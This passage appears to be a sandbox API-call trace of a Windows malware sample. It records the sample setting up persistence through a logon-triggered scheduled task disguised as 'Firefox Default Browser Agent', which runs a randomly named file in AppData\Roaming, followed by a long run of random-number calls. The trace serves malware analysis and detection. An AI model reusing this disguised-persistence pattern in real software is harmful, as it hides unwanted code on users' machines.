ppTrigger=0x1026fe30*=0x3cf3fc0) returned 0x0 [0194.350] IUnknown:QueryInterface (in: This=0x3cf3fc0, riid=0x2841020*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0x1026fd00 | out: ppvObject=0x1026fd00*=0x3cf3fc0) returned 0x0 [0194.350] ILogonTrigger:put_UserId (This=0x3cf3fc0, UserId="RDhJ0CNFevzX") returned 0x0 [0194.355] IUnknown:Release (This=0x3cf3fc0) returned 0x2 [0194.355] IUnknown:Release (This=0x3cf3fc0) returned 0x1 [0194.355] ITaskDefinition:get_Actions (in: This=0x3d41170, ppActions=0x1026fd30 | out: ppActions=0x1026fd30*=0x3d4d820) returned 0x0 [0194.355] IActionCollection:Create (in: This=0x3d4d820, Type=0, ppAction=0x1026fd48 | out: ppAction=0x1026fd48*=0x3cfb4e0) returned 0x0 [0194.355] IUnknown:Release (This=0x3d4d820) returned 0x1 [0194.355] IUnknown:QueryInterface (in: This=0x3cfb4e0, riid=0x2841040*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x1026fd38 | out: ppvObject=0x1026fd38*=0x3cfb4e0) returned 0x0 [0194.355] IExecAction:put_Path (This=0x3cfb4e0, Path="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 0x0 [0194.355] IUnknown:Release (This=0x3cfb4e0) returned 0x2 [0194.355] ITaskFolder:RegisterTaskDefinition (in: This=0x3d4db20, Path="Firefox Default Browser Agent FE7F15060B875FB9", pDefinition=0x3d41170, flags=6, UserId=0x1026fd60*(varType=0x0, wReserved1=0x7d4, wReserved2=0x0, wReserved3=0x0, varVal1=0x2845247, varVal2=0x28307a6), password=0x1026fda0*(varType=0x0, wReserved1=0x7d4, wReserved2=0x0, wReserved3=0x0, varVal1=0x2845247, varVal2=0x28307a6), LogonType=3, sddl=0x1026fd80*(varType=0x0, wReserved1=0x7d4, wReserved2=0x0, wReserved3=0x0, varVal1=0x2845247, varVal2=0x28307a6), ppTask=0x1026fd00 | out: ppTask=0x1026fd00*=0x3ced8a0) returned 0x0 [0196.281] IUnknown:Release (This=0x3cfb4e0) returned 0x1 [0196.281] IUnknown:Release (This=0x3cfba20) returned 0x1 [0196.281] TaskScheduler:IUnknown:Release (This=0x3d41170) returned 0x0 [0196.281] TaskScheduler:IUnknown:Release (This=0x3d4db20) returned 0x0 [0196.281] TaskScheduler:IUnknown:Release (This=0x3d6e150) returned 0x0 [0196.281] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41e80) returned 0x10d [0196.281] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41e80) returned 1 [0196.281] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41840) returned 0x418 [0196.282] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41840) returned 1 [0196.282] RtlSizeHeap (HeapHandle=0x7d40000, Flags=0x0, MemoryPointer=0x7d41c60) returned 0x212 [0196.282] RtlFreeHeap (HeapHandle=0x7d40000, Flags=0x0, BaseAddress=0x7d41c60) returned 1 [0196.282] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcb8 [0196.282] CreateFileMappingA (hFile=0x0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa000, lpName="FE7F15060B875FB9FB2A49F08D5D03120C287F38FF") returned 0xb38 [0196.282] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x1d) returned 0x7d41840 [0196.282] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1cafd86d [0196.283] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x125) returned 0x7d41870 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x21be0381 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6b39cd65 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5e30c1fc [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9f3056bc [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe16ea1e3 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1783296 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcab11450 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5d34bc89 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8819c23b [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd51adf2a [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcadd3c7d [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x13c1b923 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8114e0f [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdda074a4 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x40950bda [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x239cb828 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd583a66 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4458ba47 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xaeb3bd0a [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8fdcda06 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc60e61a5 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd4b76c8e [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xae0a0deb [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xeb221142 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x40710303 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xeccc969f [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x22554a7a [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x43624a6 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7a0b7b98 [0196.283] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x19638537 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8fe3c8ba [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x85ca2ad4 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xac579449 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x89b7b0fc [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcd6cb3d0 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1e49ac13 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x75e18404 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd6213765 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x12d77bf5 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4d71b60b [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x189e380b [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6b949398 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa8e65476 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1fa57647 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x306d813e [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb192aa0f [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4032a4d4 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x56a7e57 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x70709b5c [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdf9c7378 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x999dd252 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdcd64c11 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x35d67680 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd26448dd [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdb789003 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd3967c5e [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x886c0af1 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x25080c5 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x570043b3 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x35916473 [0196.284] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x20cffe51 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xca236d60 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x373679ca [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfb6d427a [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x565f7194 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1ded6e11 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9455ae42 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb8261b23 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6548f03c [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x13743052 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa9868270 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe1eafb3c [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd728cc48 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7acd2bd2 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9de9e41e [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb02a8618 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xeb7ac0f7 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2481255f [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf7916382 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa2b78d60 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x849f87b [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfbebb606 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x82300b65 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x208c1d21 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3465e986 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfa2a9649 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9ef9fc18 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x22cd1542 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x78bbe8ff [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x712438cb [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3320133b [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x29a73e8a [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x79e06e82 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd62acfc7 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xaff25fa1 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7e05b237 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe252ecd3 [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x91dafcdc [0196.285] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2d7d3f0a [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2d1d203d [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x878f8e00 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x83c45fa [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x71f8c780 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6c37a683 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x48d66ce3 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc2aee2d4 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x783f64d5 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xec5d77a7 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5e2b84ac [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf22e1870 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9c70d599 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x13f08b4c [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa41d1163 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbbaba08d [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x23624479 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7e2af825 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x280ccae5 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5e31fd6c [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6b71038f [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9dce3260 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf403edaa [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8084691b [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x66294fd9 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8ef8983e [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7bbba11c [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x52513149 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x743e52a9 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4680d09e [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xaadbae24 [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8626034a [0196.286] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x938d90b5 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6f4ccad1 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc24503dd [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x83e44914 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x371ce5d7 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe0aec2fd [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6668b150 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xaefb71ad [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa702ac99 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1f990ded [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6612282b [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xefb35c33 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd71aef40 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xac6aeff1 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa61b8ab4 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3d01d59c [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1d8f61f3 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x29316b5f [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4140299c [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcdf7457f [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x66215e9d [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x488d2d37 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xeccc39a7 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3a3f517d [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x80399e78 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x90445bc5 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x19271852 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9bb9bd2a [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x627b4a31 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb5f4408 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3d1cac39 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5a6585b8 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7fe2e209 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd57959a8 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7ee8430b [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xad90a747 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9693c8a0 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd31d9985 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6eebd740 [0196.287] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x554ba037 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x75c609b8 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xecdd4a2b [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcdce2e2b [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc5ca194 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x211548f5 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8b83f389 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x99a5864d [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x522fbf24 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc5650adb [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7b0368e4 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x35431702 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xda1f108a [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe4c67c5 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1cc43c76 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x40a820c [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9e6d5276 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x55ee441d [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe925875b [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdf2d9e90 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xda6cc2d0 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x855c1ba4 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x50e08fc2 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbe5a9adb [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x333af16f [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5df1c0c4 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6c0e5fba [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7b8b7ec1 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9e836557 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x17ec92c8 [0196.288] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6a22db40 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x515e2a86 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe086800b [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd5c66d1 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf2e0d621 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x50f7064a [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x537e7c55 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x991373ed [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x337bbe3e [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa0043be9 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x49152a37 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xacb1dc8b [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd5187b56 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x50f785a8 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3d98bf4c [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa4cfb024 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb16c7726 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x466ae2b4 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5144da45 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9348ae38 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7c28706e [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5744ff61 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3370146a [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xabbe9172 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3e76d96e [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x92727bb6 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1213a8c1 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x39d1efc0 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x87f37030 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x500121ef [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5a3107fa [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x118cee59 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5d2806a9 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xaeed9da [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x109f4d4c [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x64fd69a7 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf1bfa603 [0196.289] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1cdea810 [0196.290] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcd7263f3 [0196.290] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xecfa5b6f [0196.290] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbfa42559 [0196.290] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8736b1d7 [0196.290] RtlRandom (in: Seed=0x2830e9e | out: 